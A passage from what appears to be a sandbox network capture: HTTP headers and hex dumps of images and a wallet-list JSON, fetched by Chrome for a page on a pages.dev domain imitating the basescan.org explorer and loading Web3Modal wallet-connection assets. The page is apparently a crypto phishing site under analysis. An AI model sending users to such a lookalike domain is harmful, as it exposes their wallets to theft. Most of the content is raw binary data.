                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC331INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 01 12 49 44 41 54 78 da ad d4 b1 4b 02 61 18 c7 f1 f7 9a 53 b0 23 87 88 f6 a6 a4 a9 a1 b9 fe 82 82 8a 48 28 6a 08 da da 6b 6f 8f 96 26 83 a6 66 a3 21 82 86 92 68 11 9c 44 17 11 c5 c9 45 d1 c1 c7 ef f0 0a f2 70 e7 eb dd 79 f0 59 ee fd f1 bd e5 ee cc e4 12 63 36 71 87 6b f8 26 e9 45 24 0f b1 1a f0 17 16 b4 6e 16 1d 7c 80 87 23 fc e2 07 07 49 82 45 7c 43 94 2f e4 a2 05 dd 46 78 42 36 4e b0 8f 77 bc e0 4f 9d 75 71 11 25 f8 8c 8c da 6d a3 a2 76 39 77 90 58 c8 83 d7 51 57 db 53 57 b0 87 0c 52 f8 c0 de 54 ac 0a 51 f2 ae 60 d1 de 4b e3 13 fb 58 45 19 12 27 58 08 38 bf 85 c4 0d 96 02 ce 3d 3c c6 0d 8e b0 e5 88 3a 83 27 6a 54 c6 4a 48 f4 4d 6d 0f 83 82 59 74 d4
                                                                                                                                                                                                                                              Data Ascii: PNGIHDRIDATxKaS#H(jko&f!hDEpyYc6qk&E$n|#IE|C/FxB6NwOuq%mv9wXQWSWRTQ`KXE'X8=<:'jTJHMmYt


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              64192.168.2.549802104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC648OUTGET /images/gen/bcgame_20a.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC847INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 332
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              Cf-Polished: origSize=487
                                                                                                                                                                                                                                              ETag: "80cda0c54ee5d91:0"
                                                                                                                                                                                                                                              Last-Modified: Tue, 12 Sep 2023 07:57:27 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 123028
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PD8MZJdXxVi7tSNhhrm3nDSJuvbWXIb5ai58eAEB%2FrfZPjcU0T%2BBRi1Nlj1dt%2Bw6D8LhIMDvXqSet7ZChF1g0zDMkXs7w3ukHeywrPjHc3IqQGWzz%2B6e4KaoZGs80Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d0fdd7729b-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC332INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 01 13 49 44 41 54 78 da ad d4 b1 4b 02 61 1c 87 f1 bb e6 14 ec c8 21 a2 bd 29 69 6a 68 ae bf a0 a0 22 12 8a 1a 82 b6 f6 da db a3 a5 49 c1 c9 59 71 10 c1 41 45 5c 04 07 11 5d 44 14 27 17 45 07 5f 9f e1 90 e3 c7 9d af 77 e7 c1 67 b9 f7 cb 73 cb dd 19 eb ab 6d 9c e2 0b ef b0 8c b0 17 91 24 94 ad 0f 6b 77 41 e0 63 d7 c1 1f 98 b8 43 15 15 dc 84 09 e6 50 86 12 4a 48 f8 0b ea 2d f1 87 78 90 e0 0c 79 a4 51 17 67 13 bc f8 09 fe 23 26 76 e7 68 89 5d 42 1f 24 e6 f1 e0 63 f4 c4 f6 51 17 9c 22 86 08 0a b8 72 c4 3a 50 42 52 17 cc d9 f7 a2 28 e2 1a 87 68 42 05 09 a6 5c ce 3f a1 82 06 6b 2e e7 26 7e 83 06 97 38 d3 44 b5 c1 07 31 6a e2 c0 23 9a 15 db 5b b7 60 1c 63 31
                                                                                                                                                                                                                                              Data Ascii: PNGIHDRIDATxKa!)ijh"IYqAE\]D'E_wgsm$kwAcCPJH-xyQg#&vh]B$cQ"r:PBR(hB\?k.&~8D1j#[`c1


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              65192.168.2.549807104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC806OUTGET /public/getAssetImage/06b26297-fe0c-4733-5d6b-ffa5498aac00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC781INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                              Content-Length: 4216
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2d16d8e1986-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 8975
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                              ETag: "cfg5kHfR4p5rKyX_HbosXNTDTYUG7FeV1c8ZwDJoU7DQ"
                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 01:16:04 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              cf-bgj: imgq:86,h2pri
                                                                                                                                                                                                                                              cf-images: internal=ok/- q=0 n=1262+13 c=0+13 v=2024.9.3 l=4216 f=false
                                                                                                                                                                                                                                              content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-robots-tag: noindex
                                                                                                                                                                                                                                              X-WC-R2-Status: HIT
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC588INData Raw: 52 49 46 46 70 10 00 00 57 45 42 50 56 50 38 20 64 10 00 00 30 6a 00 9d 01 2a 90 01 90 01 3e 49 24 8f 45 a2 a2 21 13 3b ec 10 28 04 84 b1 b7 70 ba 9f 15 8c e5 2f 6f ea bf 96 7e 18 97 1b a1 7e 46 7f 72 fd b8 f9 86 a7 3f 37 fe c1 f9 ab fa ef ed 9f c5 ef d1 6f 32 39 f3 f4 97 d7 6b c2 7f 22 ff a7 fc f3 f7 87 fe 37 d4 4f 40 1e 60 1f c2 7f 82 7f 6c fe 93 fd cb f5 c3 eb ff a0 9f e7 5e 80 3f 8b ff 6d fd d2 ff ff f1 67 e8 cb ff 0f a8 07 fa 1f 37 6f 60 ef da 2f 62 0f 2f 0f 63 ef da 7f de 5f 80 9f e7 1f d3 bf ff fb 00 7f ff f6 f7 e9 1f f4 2f ee 5d 8b ff 9c fe db fb 41 fd 17 a6 fa 58 37 0b f6 19 cb 9e 97 77 b7 bc 23 f8 47 f6 2f b6 ef 80 c8 9a fc 7e f6 6d 52 3f 7c 3d 7d f1 ba 58 37 f4 61 67 35 9b 6a 29 54 66 da 8a 55 19 b6 a2 95 46 6d a8 a5 51 9b 6a 29 54 66 da 8a 55
                                                                                                                                                                                                                                              Data Ascii: RIFFpWEBPVP8 d0j*>I$E!;(p/o~~Fr?7o29k"7O@`l^?mg7o`/b/c_/]AX7w#G/~mR?|=}X7ag5j)TfUFmQj)TfU
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 56 3d 17 e9 42 2f 22 fd 9d b7 14 0a 43 ec fa 82 f5 44 49 c5 76 45 31 74 27 95 a8 26 de 80 bb 87 14 b3 a7 03 3d 98 04 93 f5 bc 3e cd 4e 51 69 f0 cc 23 29 4d e7 ce 60 14 c4 97 d5 48 39 7b f2 b0 7f 7a b4 fe 28 54 0e 10 13 b8 eb 4a a3 36 83 ac 37 15 ee e0 1b 79 8b 21 fa de 23 7e e1 ab 36 85 73 bc 6d a8 a5 50 07 99 f4 1d 38 f8 db 39 cc 0a 97 0c f6 60 12 4f 9a 0b 6a ea 11 44 d4 0c f5 59 f8 d2 a4 db bc 7c 82 a0 30 0d cf 5e ba 76 f2 34 a3 31 f5 ef e2 c1 5a f4 f6 60 12 4f d7 3c 4b 36 00 f4 8f a8 c5 14 4f ad e7 51 6a ba 58 58 a8 ac bf d4 b4 6e 7f f5 d0 db ec eb ff 06 6e 5e 2c 73 bc 6d a8 a5 51 9b 66 8c b9 15 fc f3 40 79 ce 8f 29 fc 5a d9 99 2f f9 86 a6 ff be f5 9f ae 77 8d b5 14 aa 33 6c eb 93 2d 34 fe b9 47 e4 12 4f d7 3b c6 da 8a 55 19 b6 a2 95 46 6d a8 a5 51 9b
                                                                                                                                                                                                                                              Data Ascii: V=B/"CDIvE1t'&=>NQi#)M`H9{z(TJ67y!#~6smP89`OjDY|0^v41Z`O<K6OQjXXnn^,smQf@y)Z/w3l-4GO;UFmQ
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 06 5d 7b ce 3d 8c 3d 03 be c0 1a fe e1 0d 40 93 9d 34 25 2c 2b f9 7e 1c a3 23 e0 67 21 35 33 7b 77 48 3b 09 eb 72 b9 35 2e 08 2a 97 e2 ac 2d c1 89 be 7f bc db 77 01 12 01 22 be e9 23 93 2a a6 d4 8b 95 68 d0 a6 c0 cb 48 8c 94 48 2f a5 c7 ca 21 fe ac 3b 2b e3 5c d9 35 14 7c c3 68 eb 9e 72 43 1c c3 dd 2a 5e 64 03 2b 58 18 1a 17 8e 1a 6b b4 07 2d 66 ab cf 85 a6 57 2f 72 be 4b c0 0b 56 8a 39 9c 37 f0 2f 41 90 0d 88 81 73 af 3d 75 73 70 c6 0a 97 8a d8 d8 a8 6b ce 58 96 ba 07 f9 3f 93 36 63 b8 21 7a 30 ba 0d c9 c4 bc 6a d2 1b 49 47 11 93 7f 1f 14 87 02 77 5a f9 d6 60 33 5a 47 c8 e2 d4 87 2f 4f d3 15 04 27 0d 3f 15 c4 74 3c 3f e1 18 50 80 9a db 3b cc e1 04 05 af 70 e2 f6 44 c1 ff 52 ac 43 1b 7d 0e 51 df f2 f9 61 c3 44 b8 59 60 2c 47 0a 56 87 f7 2a 35 95 a9 a3 27
                                                                                                                                                                                                                                              Data Ascii: ]{==@4%,+~#g!53{wH;r5.*-w"#*hHH/!;+\5|hrC*^d+Xk-fW/rKV97/As=uspkX?6c!z0jIGwZ`3ZG/O'?t<?P;pDRC}QaDY`,GV*5'
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC890INData Raw: bf ef 18 e6 90 1f e0 6e fa 2b 5d 9d 1f b0 50 33 c0 74 8f 3e 5c dd f2 98 ba 2a eb 60 50 4a d8 17 a8 2d 94 6a 2f 7e a8 f6 60 a8 08 06 20 21 74 89 04 62 e7 e2 b2 ed d1 3e bf 5b 3c 94 5a cd 09 0e ff 8f 22 02 09 42 0f 2e e6 06 36 97 f6 9d 60 a7 63 e5 7c a5 78 a6 e1 bc 1c ca 38 8e 4c 91 25 67 55 a8 1b 8f 8e d4 1f fd f4 aa 8d b1 95 3a 00 89 6e 46 93 bc 16 4e ed 86 5d 80 00 2a 2e 7c 09 df 07 a0 04 fb e3 87 60 c6 34 a1 91 08 70 a1 ff ca 8c 46 1f 39 e8 fc a6 d5 07 da c9 00 b0 79 d4 1b 38 fb bb ea 6a 31 94 e0 3b 6e d0 f1 76 bd 7b 3a 86 c1 6c 2e b7 89 9e 75 b9 fe 26 bd 9a 23 2f ae e4 82 7d bf 1d 3f 7d b9 dd f3 e4 e9 25 9b be cd 59 59 aa a4 3a a4 59 75 ae 9f 65 48 fa dd 24 ae 3d d1 9b 9f b4 84 5a 7b 4b 78 15 e5 6c 9f d8 8a 7d cb 19 1b 1e e1 37 3c d8 21 f8 be 98 6b 7d
                                                                                                                                                                                                                                              Data Ascii: n+]P3t>\*`PJ-j/~` !tb>[<Z"B.6`c|x8L%gU:nFN]*.|`4pF9y8j1;nv{:l.u&#/}?}%YY:YueH$=Z{Kxl}7<!k}


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              66192.168.2.549803104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC776OUTGET /getWallets?page=1&entries=4 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC557INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                              Content-Length: 3335
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2d14de18cec-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 17172
                                                                                                                                                                                                                                              Cache-Control: public, max-age=43200
                                                                                                                                                                                                                                              Expires: Sat, 28 Sep 2024 13:16:04 GMT
                                                                                                                                                                                                                                              Last-Modified: Fri, 27 Sep 2024 20:29:52 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              X-Robots-Tag: noindex
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC812INData Raw: 7b 22 63 6f 75 6e 74 22 3a 34 33 34 2c 22 64 61 74 61 22 3a 5b 7b 22 69 64 22 3a 22 63 35 37 63 61 39 35 62 34 37 35 36 39 37 37 38 61 38 32 38 64 31 39 31 37 38 31 31 34 66 34 64 62 31 38 38 62 38 39 62 37 36 33 63 38 39 39 62 61 30 62 65 32 37 34 65 39 37 32 36 37 64 39 36 22 2c 22 6e 61 6d 65 22 3a 22 4d 65 74 61 4d 61 73 6b 22 2c 22 68 6f 6d 65 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 65 74 61 6d 61 73 6b 2e 69 6f 2f 22 2c 22 69 6d 61 67 65 5f 69 64 22 3a 22 30 31 38 62 32 64 35 32 2d 31 30 65 39 2d 34 31 35 38 2d 31 66 64 65 2d 61 35 64 35 62 61 63 35 61 61 30 30 22 2c 22 6f 72 64 65 72 22 3a 31 30 2c 22 6d 6f 62 69 6c 65 5f 6c 69 6e 6b 22 3a 22 6d 65 74 61 6d 61 73 6b 3a 2f 2f 22 2c 22 64 65 73 6b 74 6f 70 5f 6c 69 6e 6b 22 3a 6e 75 6c 6c 2c
                                                                                                                                                                                                                                              Data Ascii: {"count":434,"data":[{"id":"c57ca95b47569778a828d19178114f4db188b89b763c899ba0be274e97267d96","name":"MetaMask","homepage":"https://metamask.io/","image_id":"018b2d52-10e9-4158-1fde-a5d5bac5aa00","order":10,"mobile_link":"metamask://","desktop_link":null,
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 34 66 2d 33 34 38 36 2d 34 36 65 32 2d 34 65 33 37 2d 62 66 38 37 34 37 38 31 34 66 30 30 22 2c 22 6f 72 64 65 72 22 3a 32 30 2c 22 6d 6f 62 69 6c 65 5f 6c 69 6e 6b 22 3a 22 74 72 75 73 74 3a 2f 2f 22 2c 22 64 65 73 6b 74 6f 70 5f 6c 69 6e 6b 22 3a 6e 75 6c 6c 2c 22 6c 69 6e 6b 5f 6d 6f 64 65 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 69 6e 6b 2e 74 72 75 73 74 77 61 6c 6c 65 74 2e 63 6f 6d 22 2c 22 77 65 62 61 70 70 5f 6c 69 6e 6b 22 3a 6e 75 6c 6c 2c 22 61 70 70 5f 73 74 6f 72 65 22 3a 22 68 74 74 70 73 3a 2f 2f 61 70 70 73 2e 61 70 70 6c 65 2e 63 6f 6d 2f 61 70 70 2f 61 70 70 6c 65 2d 73 74 6f 72 65 2f 69 64 31 32 38 38 33 33 39 34 30 39 22 2c 22 70 6c 61 79 5f 73 74 6f 72 65 22 3a 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73
                                                                                                                                                                                                                                              Data Ascii: 4f-3486-46e2-4e37-bf8747814f00","order":20,"mobile_link":"trust://","desktop_link":null,"link_mode":"https://link.trustwallet.com","webapp_link":null,"app_store":"https://apps.apple.com/app/apple-store/id1288339409","play_store":"https://play.google.com/s
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1154INData Raw: 79 5f 73 74 6f 72 65 22 3a 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 74 6f 72 65 2f 61 70 70 73 2f 64 65 74 61 69 6c 73 3f 69 64 3d 63 6f 6d 2e 6f 6b 69 6e 63 2e 6f 6b 65 78 2e 67 70 22 2c 22 72 64 6e 73 22 3a 22 63 6f 6d 2e 6f 6b 65 78 2e 77 61 6c 6c 65 74 22 2c 22 63 68 72 6f 6d 65 5f 73 74 6f 72 65 22 3a 22 68 74 74 70 73 3a 2f 2f 63 68 72 6f 6d 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 77 65 62 73 74 6f 72 65 2f 64 65 74 61 69 6c 2f 6f 6b 78 2d 77 61 6c 6c 65 74 2f 6d 63 6f 68 69 6c 6e 63 62 66 61 68 62 6d 67 64 6a 6b 62 70 65 6d 63 63 69 69 6f 6c 67 63 67 65 22 2c 22 69 6e 6a 65 63 74 65 64 22 3a 5b 7b 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 65 69 70 31 35 35 22 2c 22 69 6e 6a 65 63 74 65 64 5f 69 64 22 3a 22 69 73 50
                                                                                                                                                                                                                                              Data Ascii: y_store":"https://play.google.com/store/apps/details?id=com.okinc.okex.gp","rdns":"com.okex.wallet","chrome_store":"https://chrome.google.com/webstore/detail/okx-wallet/mcohilncbfahbmgdjkbpemcciiolgcge","injected":[{"namespace":"eip155","injected_id":"isP


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              67192.168.2.549805104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC806OUTGET /public/getAssetImage/ab9c186a-c52f-464b-2906-ca59d760a400 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC781INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                              Content-Length: 2982
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2d16d054257-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 28149
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                              ETag: "cf1bMzkffidOhcD7Rqm7-8S115UG7FeV1c8ZwDJoU7DQ"
                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 01:16:04 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              cf-bgj: imgq:86,h2pri
                                                                                                                                                                                                                                              cf-images: internal=ok/- q=0 n=664+12 c=0+12 v=2024.9.3 l=2982 f=false
                                                                                                                                                                                                                                              content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-robots-tag: noindex
                                                                                                                                                                                                                                              X-WC-R2-Status: HIT
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC588INData Raw: 52 49 46 46 9e 0b 00 00 57 45 42 50 56 50 38 20 92 0b 00 00 10 52 00 9d 01 2a 90 01 90 01 3e 49 24 8c 46 22 a2 21 21 23 93 f0 50 09 09 67 6e e1 77 4e 00 12 12 7f 69 fc 8a ef bc bd 5d 7b fb 07 ec 37 e5 97 4b 7e df f7 9f f7 27 96 91 05 7a 6b ec c7 e3 bf aa 7e db 7f 9e ff ff ff ff e8 87 f8 0f c6 ef 92 ff a4 7d 80 3f 4c 7f ca 7f 6d fe f1 fe e3 b4 7f 98 0f e8 7f de 3f e3 ff 80 f7 7a fe f9 fb 63 ee 3b fa ef f9 cf c4 0f 90 0f e9 1f d8 fa c9 ff 69 bd 81 3f 96 7f 82 f4 c6 fd af f8 5b fd a3 fd 95 f6 7b ff b1 ad 02 c3 3f c2 74 6d fb 7e 49 c7 01 fc 63 ed 57 99 f8 c1 da db 77 e4 00 6e f3 a7 83 30 bf 35 e1 45 2e 4f c6 4f f1 93 fc 64 ff 19 41 2d 5c db f6 ac fd ab 3f 6a cf da b3 f6 ac fd ab 3f 6a cf da b3 f6 ac fd ab 3f 6a cf da b3 f6 ac fd ab 3f 6a cf da b3 f6 ac fd ab
                                                                                                                                                                                                                                              Data Ascii: RIFFWEBPVP8 R*>I$F"!!#PgnwNi]{7K~'zk~}?Lm?zc;i?[{?tm~IcWwn05E.OOdA-\?j?j?j?j
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 2b a7 ed 59 fb 56 7e d5 9f b5 67 ed 59 fb 56 7e d5 9f b5 67 ed 59 fb 56 7e d5 9f b5 67 ed 59 fb 56 7e d5 9f b5 67 ed 59 fb 56 7e d5 9f b5 67 ed 59 fb 56 7e d5 9f b5 67 ed 59 fb 56 7e d5 9f b5 67 ed 59 fb 56 7e d5 9f b5 67 ed 59 fb 56 7e d5 9f b5 67 ed 59 fb 56 7e d5 9f b5 67 ed 59 fb 20 00 00 fe fa e2 be 72 b5 91 b8 f2 78 7d ff 41 eb e8 3c 85 ce ba 0e 02 5a 05 00 00 00 00 00 00 00 00 2b 2a 79 e5 9e 09 cc 4a 7f e6 99 c6 14 cf fd 3d d9 98 6b 34 eb 3e 77 70 15 89 37 7a 4f a1 b8 ce ee d4 8a ca f8 ed 90 c8 bc 25 51 2b 40 09 cf 24 f8 26 0b 7a 64 07 ae 07 6b 2c 1a 9f c2 c2 fe 30 48 e6 0f b6 c4 4c 98 43 24 60 5e e3 80 e1 9b 1f 07 de 75 81 34 bc fc e9 45 34 0b ff 8d aa 09 4a 49 ef 19 66 83 74 c3 d2 d9 81 dd 32 ac f9 7e 38 5b f3 94 d1 9b 33 62 39 d3 f9 24 6a 7a be
                                                                                                                                                                                                                                              Data Ascii: +YV~gYV~gYV~gYV~gYV~gYV~gYV~gYV~gYV~gYV~gY rx}A<Z+*yJ=k4>wp7zO%Q+@$&zdk,0HLC$`^u4E4JIft2~8[3b9$jz
